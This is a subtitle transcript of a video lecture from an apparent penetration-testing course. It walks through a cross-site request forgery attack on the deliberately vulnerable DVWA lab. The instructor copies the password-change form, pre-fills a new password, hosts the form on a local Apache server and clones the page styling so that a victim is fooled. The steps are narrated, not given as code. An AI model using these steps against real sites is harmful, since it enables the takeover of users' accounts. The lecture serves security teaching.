1
00:00:00,600 --> 00:00:01,650
Instructor: Welcome back.

2
00:00:01,650 --> 00:00:06,650
In this video I want to talk about vulnerability called CSRF

3
00:00:07,020 --> 00:00:11,490
or also known as cross-site request forgery.

4
00:00:11,490 --> 00:00:13,920
Now this is something that you might remember

5
00:00:13,920 --> 00:00:16,170
from the scanning section of the course

6
00:00:16,170 --> 00:00:19,320
where we used Nmap to discover vulnerabilities.

7
00:00:19,320 --> 00:00:22,320
And on one of our targets we got response

8
00:00:22,320 --> 00:00:26,760
that possible CSRF vulnerability was there.

9
00:00:26,760 --> 00:00:28,710
Well, the time has come

10
00:00:28,710 --> 00:00:32,729
to finally see what is this vulnerability.

11
00:00:32,729 --> 00:00:35,460
Many people think that this is something similar

12
00:00:35,460 --> 00:00:38,910
or the same as XSS or cross-site scripting,

13
00:00:38,910 --> 00:00:40,890
but that is not the case.

14
00:00:40,890 --> 00:00:42,990
In cross-site request forgery,

15
00:00:42,990 --> 00:00:45,540
the attacker makes the identified user

16
00:00:45,540 --> 00:00:49,590
execute something that they didn't want to execute.

17
00:00:49,590 --> 00:00:53,400
CSRF attack can be used to exploit any web function

18
00:00:53,400 --> 00:00:55,440
that searches for one request

19
00:00:55,440 --> 00:00:57,420
inside of the identified session

20
00:00:57,420 --> 00:01:01,323
in case the security applied isn't efficient enough.

21
00:01:02,280 --> 00:01:03,750
Some of the things that you can do

22
00:01:03,750 --> 00:01:05,940
with cross-site request forgery

23
00:01:05,940 --> 00:01:08,100
would be something like changing details

24
00:01:08,100 --> 00:01:11,280
about a specific user like email addresses,

25
00:01:11,280 --> 00:01:14,400
date when they were born and so on and so on.

26
00:01:14,400 --> 00:01:17,430
You can also perform fake banking transactions,

27
00:01:17,430 --> 00:01:20,370
adding items to buy on a certain page,

28
00:01:20,370 --> 00:01:24,060
but this is not something that we can accomplish easily.

29
00:01:24,060 --> 00:01:26,220
For this attack, we need a victim

30
00:01:26,220 --> 00:01:30,150
that has active identified session inside of the website

31
00:01:30,150 --> 00:01:33,510
and they will also have to visit our URL link

32
00:01:33,510 --> 00:01:36,600
that we craft in order for this to work.

33
00:01:36,600 --> 00:01:39,330
Now let's take a look at simple example

34
00:01:39,330 --> 00:01:43,110
of how to do this on our DVWA page.

35
00:01:43,110 --> 00:01:47,610
So start your metasploitable, visit the page as usual.

36
00:01:47,610 --> 00:01:52,080
We want to go to the DVWA and we can log in right here.

37
00:01:52,080 --> 00:01:54,540
But remember that we did the SQL injection.

38
00:01:54,540 --> 00:01:57,300
We no longer have to log in as admin user.

39
00:01:57,300 --> 00:01:59,460
We can log in as any other user

40
00:01:59,460 --> 00:02:02,820
from the data that we extracted with our SQL injection.

41
00:02:02,820 --> 00:02:05,940
So if you remember we had the user called Gordon

42
00:02:05,940 --> 00:02:08,100
who had the user name of gordonb

43
00:02:08,100 --> 00:02:10,860
and his password was ABC123.

44
00:02:10,860 --> 00:02:13,770
If you remember that we got his MD5 hash

45
00:02:13,770 --> 00:02:15,570
then we pasted it inside with the Google

46
00:02:15,570 --> 00:02:18,240
and we got that his hash was equivalent

47
00:02:18,240 --> 00:02:20,013
to a string of ABC123.

48
00:02:21,240 --> 00:02:23,400
So we can log in as Gordon.

49
00:02:23,400 --> 00:02:26,553
And we can see down here you have logged in as gordonb.

50
00:02:27,930 --> 00:02:29,853
Now let's set the security to low,

51
00:02:32,040 --> 00:02:35,643
and let's navigate to CSRF right here.

52
00:02:36,510 --> 00:02:38,640
So we can see vulnerability:

53
00:02:38,640 --> 00:02:42,630
cross-site request forgery and the application requires us

54
00:02:42,630 --> 00:02:45,450
to change our admin password.

55
00:02:45,450 --> 00:02:50,010
so we got the new password and confirm new password.

56
00:02:50,010 --> 00:02:54,230
What we can do is we can, for example, type password123

57
00:02:55,770 --> 00:02:58,963
and confirm password to be password123.

58
00:03:00,990 --> 00:03:04,710
If I click on change, it says password changed

59
00:03:04,710 --> 00:03:07,560
and let's see whether it indeed got changed.

60
00:03:07,560 --> 00:03:10,680
So if I log in as admin and then password

61
00:03:10,680 --> 00:03:12,780
remember that before it was just password,

62
00:03:12,780 --> 00:03:15,000
now it is password123.

63
00:03:15,000 --> 00:03:17,550
If I log in, well now it'll work.

64
00:03:17,550 --> 00:03:20,070
We successfully changed the password.

65
00:03:20,070 --> 00:03:23,103
But how can we use this to exploit it?

66
00:03:24,060 --> 00:03:28,380
Well, if I go right click and go on view page source,

67
00:03:28,380 --> 00:03:30,840
there will be a vulnerable part of code

68
00:03:30,840 --> 00:03:32,430
inside of this page.

69
00:03:32,430 --> 00:03:35,010
And that part of code will be the form

70
00:03:35,010 --> 00:03:38,340
where we submit the new password.

71
00:03:38,340 --> 00:03:39,900
If we scroll all the way down,

72
00:03:39,900 --> 00:03:41,940
here is the part of the code that is vulnerable.

73
00:03:41,940 --> 00:03:45,300
We got the form where we can submit the new password

74
00:03:45,300 --> 00:03:48,420
where we can also reconfirm the new password.

75
00:03:48,420 --> 00:03:49,350
And you will notice

76
00:03:49,350 --> 00:03:53,310
that this is under the vulnerable code area.

77
00:03:53,310 --> 00:03:56,760
So what we can do with CSRF is we can copy

78
00:03:56,760 --> 00:03:58,380
this vulnerable form

79
00:03:58,380 --> 00:04:01,140
where we submit the username and password,

80
00:04:01,140 --> 00:04:04,110
and we are going to create our small HTML page

81
00:04:04,110 --> 00:04:06,690
that we are going to host on our Apache2 web server.

82
00:04:06,690 --> 00:04:10,050
And you're going to see in just a second why we do that.

83
00:04:10,050 --> 00:04:11,820
So we'll open a terminal

84
00:04:11,820 --> 00:04:16,290
and I will navigate to the directory of our web server.

85
00:04:16,290 --> 00:04:17,190
And if you remember

86
00:04:17,190 --> 00:04:21,570
that is /var/www/html.

87
00:04:21,570 --> 00:04:25,260
Now since we can't write files right here as a regular user,

88
00:04:25,260 --> 00:04:27,243
let us enter the root account.

89
00:04:28,350 --> 00:04:32,430
If I type ls, we got our tester.py, we can remove it.

90
00:04:32,430 --> 00:04:33,720
We no longer need it here.

91
00:04:33,720 --> 00:04:37,200
And once you got this directory clear and empty,

92
00:04:37,200 --> 00:04:41,850
let us nano csrf.html file.

93
00:04:41,850 --> 00:04:43,290
Let's call it like that.

94
00:04:43,290 --> 00:04:45,480
Now feel free to call it anything that you want.

95
00:04:45,480 --> 00:04:48,420
Just make sure that you have this html extension

96
00:04:48,420 --> 00:04:49,743
onto this file.

97
00:04:50,640 --> 00:04:53,490
Now that we opened it, we can paste the code

98
00:04:53,490 --> 00:04:55,020
that we copies from the page

99
00:04:55,020 --> 00:04:56,760
and you will notice it is the form

100
00:04:56,760 --> 00:04:58,920
where we change our password.

101
00:04:58,920 --> 00:05:00,510
Now there are a few things

102
00:05:00,510 --> 00:05:03,510
that we want to change right here.

103
00:05:03,510 --> 00:05:07,650
For example, this action, we want to change to the page link

104
00:05:07,650 --> 00:05:10,320
where we change our password on our DVWA.

105
00:05:10,320 --> 00:05:13,593
And that page link is this link right here.

106
00:05:14,430 --> 00:05:17,520
Let's copy it, let's paste it right here.

107
00:05:17,520 --> 00:05:20,730
And what this action simply refers to is once we change

108
00:05:20,730 --> 00:05:22,710
the password, it'll redirect us

109
00:05:22,710 --> 00:05:26,550
to whatever page is inside of this action field.

110
00:05:26,550 --> 00:05:31,260
So it'll just redirect us back to this page right here.

111
00:05:31,260 --> 00:05:34,110
Let's copy this and paste it.

112
00:05:34,110 --> 00:05:36,150
Now that we got the page right here,

113
00:05:36,150 --> 00:05:37,860
there are two more things that we need to add

114
00:05:37,860 --> 00:05:39,660
in order for this attack to work

115
00:05:39,660 --> 00:05:42,660
and that is inside of this input fields.

116
00:05:42,660 --> 00:05:46,110
So we got the name of the field, which is password_new.

117
00:05:46,110 --> 00:05:48,480
I believe it is this field right here.

118
00:05:48,480 --> 00:05:51,090
And the second field is confirm new password,

119
00:05:51,090 --> 00:05:54,423
which is this field right here, password_confirm.

120
00:05:55,290 --> 00:05:58,980
We want to automatically add value to those fields.

121
00:05:58,980 --> 00:06:02,340
And in this case that value will be a new password.

122
00:06:02,340 --> 00:06:04,890
So what we can do is we can type space

123
00:06:04,890 --> 00:06:06,870
right after the password name

124
00:06:06,870 --> 00:06:08,860
and we can type value="",

125
00:06:10,620 --> 00:06:12,480
and in between the double quotes

126
00:06:12,480 --> 00:06:14,310
we can type the new password.

127
00:06:14,310 --> 00:06:17,250
Let's say the new password is hacked.

128
00:06:17,250 --> 00:06:19,590
We must do that for the second field as well.

129
00:06:19,590 --> 00:06:24,590
So value="" and then hacked.

130
00:06:24,690 --> 00:06:26,850
Now you will notice once we visit this page

131
00:06:26,850 --> 00:06:30,390
that in that case the fields will already be completed,

132
00:06:30,390 --> 00:06:32,220
they will have this hacked value

133
00:06:32,220 --> 00:06:35,010
inside of both of these fields.

134
00:06:35,010 --> 00:06:35,940
Let's give it a try.

135
00:06:35,940 --> 00:06:38,110
If I save this Control + O

136
00:06:40,320 --> 00:06:42,720
and I start my Apache2 web server

137
00:06:42,720 --> 00:06:45,993
by typing service Apache2 start,

138
00:06:47,820 --> 00:06:51,190
all we need to do right now is visit our local host

139
00:06:52,860 --> 00:06:57,330
and the csrf.html file, which is the only file

140
00:06:57,330 --> 00:07:00,690
inside of our Apache2 web server directory.

141
00:07:00,690 --> 00:07:03,360
So we got this right here.

142
00:07:03,360 --> 00:07:04,530
And this is the link

143
00:07:04,530 --> 00:07:07,320
that we would want to send to our victim.

144
00:07:07,320 --> 00:07:08,970
Now I know it doesn't nearly look

145
00:07:08,970 --> 00:07:10,710
as good as this page right here,

146
00:07:10,710 --> 00:07:13,650
but let's just give it a try to see if it works.

147
00:07:13,650 --> 00:07:16,320
If we did everything correctly,

148
00:07:16,320 --> 00:07:18,390
once we click on this change button

149
00:07:18,390 --> 00:07:21,780
on our local host CSRF file,

150
00:07:21,780 --> 00:07:24,510
we will successfully change the password

151
00:07:24,510 --> 00:07:28,080
of the admin account on this DVWA page.

152
00:07:28,080 --> 00:07:29,730
So we send this to the target,

153
00:07:29,730 --> 00:07:30,970
target clicks on change

154
00:07:32,760 --> 00:07:34,890
and we get redirected

155
00:07:34,890 --> 00:07:38,880
to our metasploitable DVWA CSRF page

156
00:07:38,880 --> 00:07:41,910
and it says password changed.

157
00:07:41,910 --> 00:07:44,070
Let's see whether it indeed got changed.

158
00:07:44,070 --> 00:07:46,200
Remember we typed the value of hacked

159
00:07:46,200 --> 00:07:47,400
and now if I go right here

160
00:07:47,400 --> 00:07:49,923
and type admin and hacked,

161
00:07:51,030 --> 00:07:55,140
well it worked, we logged in with new password

162
00:07:55,140 --> 00:07:58,560
that someone typed in while visiting our page

163
00:07:58,560 --> 00:08:00,540
on our local host.

164
00:08:00,540 --> 00:08:02,703
But if you noticed on this page,

165
00:08:05,700 --> 00:08:07,080
we only copied the form.

166
00:08:07,080 --> 00:08:09,330
And if we were to host just the form code

167
00:08:09,330 --> 00:08:12,600
on our Apache2 server like we are doing right now,

168
00:08:12,600 --> 00:08:13,770
it would look suspicious

169
00:08:13,770 --> 00:08:18,570
because if we take a look at this page and this page,

170
00:08:18,570 --> 00:08:21,180
they don't look nearly the same.

171
00:08:21,180 --> 00:08:23,760
So how could we make it look the same?

172
00:08:23,760 --> 00:08:27,450
Well, first thing that we must do is we must go right here,

173
00:08:27,450 --> 00:08:29,580
right click view page source,

174
00:08:29,580 --> 00:08:33,450
and we must copy the entire HTML code and not just the form.

175
00:08:33,450 --> 00:08:35,909
So what you can do is you can select the page,

176
00:08:35,909 --> 00:08:39,270
type Control + A, it will select all the code

177
00:08:39,270 --> 00:08:42,840
inside of this file and we can copy it.

178
00:08:42,840 --> 00:08:45,930
Then we can go to our Apache web directory

179
00:08:45,930 --> 00:08:50,643
and we can remove the CSRF file and we can nano new one.

180
00:08:52,230 --> 00:08:54,280
Here we will paste the entire code

181
00:08:56,280 --> 00:08:58,740
and remember that we must do the same thing

182
00:08:58,740 --> 00:09:00,360
that we did inside of our form.

183
00:09:00,360 --> 00:09:03,960
So find the form code, and here we want to put the link

184
00:09:03,960 --> 00:09:06,873
to our page, which is this link once again.

185
00:09:07,710 --> 00:09:09,663
Copy it, paste it right here.

186
00:09:11,280 --> 00:09:14,313
We also want to add the value to our password fields.

187
00:09:15,330 --> 00:09:18,870
We can change right now the password back to password

188
00:09:18,870 --> 00:09:22,740
just so we put it back as it was.

189
00:09:22,740 --> 00:09:26,880
And now that we did this, we can save this.

190
00:09:26,880 --> 00:09:29,550
And if I go and visit a page once again

191
00:09:29,550 --> 00:09:32,190
or I just reload this page,

192
00:09:32,190 --> 00:09:33,720
well it looks a little bit better

193
00:09:33,720 --> 00:09:36,150
but it is still not the same page,

194
00:09:36,150 --> 00:09:40,110
we're missing some decoration that this page has.

195
00:09:40,110 --> 00:09:43,320
And if you have some experience in web development,

196
00:09:43,320 --> 00:09:47,130
you will know that we are missing the CSS file.

197
00:09:47,130 --> 00:09:51,000
So what we can do to add the CSS file is we can go

198
00:09:51,000 --> 00:09:55,620
to this page source of our page that we got open

199
00:09:55,620 --> 00:09:57,870
and we can navigate to the CSS file.

200
00:09:57,870 --> 00:10:02,343
So just search for any file type that ends with .css.

201
00:10:03,300 --> 00:10:06,240
And if I go up here, here is one of them

202
00:10:06,240 --> 00:10:08,400
and it is called main.css.

203
00:10:08,400 --> 00:10:09,780
And by looking at this page,

204
00:10:09,780 --> 00:10:13,320
it seems that this is the only CSS file that this page has.

205
00:10:13,320 --> 00:10:14,670
So let's click on that.

206
00:10:14,670 --> 00:10:17,730
And here is the CSS code that we also must save

207
00:10:17,730 --> 00:10:20,490
in the same directory as our HTML file.

208
00:10:20,490 --> 00:10:23,253
So let's select everything copy this,

209
00:10:24,360 --> 00:10:28,200
and let's go back to our web directory.

210
00:10:28,200 --> 00:10:31,200
Right here we are going to nano main.css

211
00:10:31,200 --> 00:10:34,350
and let's just paste all of this code.

212
00:10:34,350 --> 00:10:37,690
Now that we have the CSS code right here, we can save this

213
00:10:38,580 --> 00:10:40,200
but it'll still not work

214
00:10:40,200 --> 00:10:44,790
if we don't change the file location inside of our code.

215
00:10:44,790 --> 00:10:46,790
Because if you take a look at right here

216
00:10:47,820 --> 00:10:49,710
where we add the CSS file,

217
00:10:49,710 --> 00:10:53,370
it is still the location on our metasploitable machine.

218
00:10:53,370 --> 00:10:56,520
And since we have it in the same directory as our html file

219
00:10:56,520 --> 00:10:58,230
on our Apache2 web server,

220
00:10:58,230 --> 00:11:02,190
what we can do is we can just remove the entire path

221
00:11:02,190 --> 00:11:04,380
and leave just the name of the file

222
00:11:04,380 --> 00:11:07,080
because they're both located in the same directory.

223
00:11:07,080 --> 00:11:11,073
So we can just leave it like this, then we can save this.

224
00:11:12,510 --> 00:11:17,010
And now if we refresh our local host page,

225
00:11:17,010 --> 00:11:21,990
well, now it looks the same, just this page isn't zoomed in.

226
00:11:21,990 --> 00:11:24,150
So what we can do is we can zoom this in

227
00:11:24,150 --> 00:11:27,150
and they look exactly the same.

228
00:11:27,150 --> 00:11:30,420
So the password is, remember right now just password.

229
00:11:30,420 --> 00:11:31,983
And if we click on change,

230
00:11:32,850 --> 00:11:34,740
it'll redirect us to the real page

231
00:11:34,740 --> 00:11:37,530
and it'll say the password has changed.

232
00:11:37,530 --> 00:11:38,970
Let's give it a try once again

233
00:11:38,970 --> 00:11:40,920
and see whether it indeed got changed.

234
00:11:40,920 --> 00:11:44,940
So I will just go to my DVWA page, log out,

235
00:11:44,940 --> 00:11:47,793
and type admin and then password.

236
00:11:50,700 --> 00:11:52,890
And we did it again

237
00:11:52,890 --> 00:11:57,163
just this time we made our page look exactly the same

238
00:12:01,290 --> 00:12:03,120
as we can see right here.

239
00:12:03,120 --> 00:12:06,540
Great, this is the CSRF attack

240
00:12:06,540 --> 00:12:10,080
or cross-site request forger attack.

241
00:12:10,080 --> 00:12:12,660
As you can see, it requires to open our link,

242
00:12:12,660 --> 00:12:14,310
otherwise this will not work.

243
00:12:14,310 --> 00:12:16,050
But if you manage to trick them

244
00:12:16,050 --> 00:12:18,510
by making the page look identical,

245
00:12:18,510 --> 00:12:20,640
then this attack will work

246
00:12:20,640 --> 00:12:23,340
and you will successfully change their password.

247
00:12:23,340 --> 00:12:25,620
Now this can be performed on other stuff

248
00:12:25,620 --> 00:12:28,860
and not just the password fields as we remembered.

249
00:12:28,860 --> 00:12:30,540
You can use this to change emails,

250
00:12:30,540 --> 00:12:33,543
to change dates, and many other things as well.

251
00:12:34,590 --> 00:12:35,850
Now that we covered this,

252
00:12:35,850 --> 00:12:40,080
in the next video we are going to cover brute force attack,

253
00:12:40,080 --> 00:12:40,950
and we are going to see

254
00:12:40,950 --> 00:12:42,840
how we can perform the brute force attack

255
00:12:42,840 --> 00:12:44,730
in two different ways.

256
00:12:44,730 --> 00:12:45,690
So thank you for watching

257
00:12:45,690 --> 00:12:48,030
and I will see you in the next lecture.

258
00:12:48,030 --> 00:12:48,863
Bye.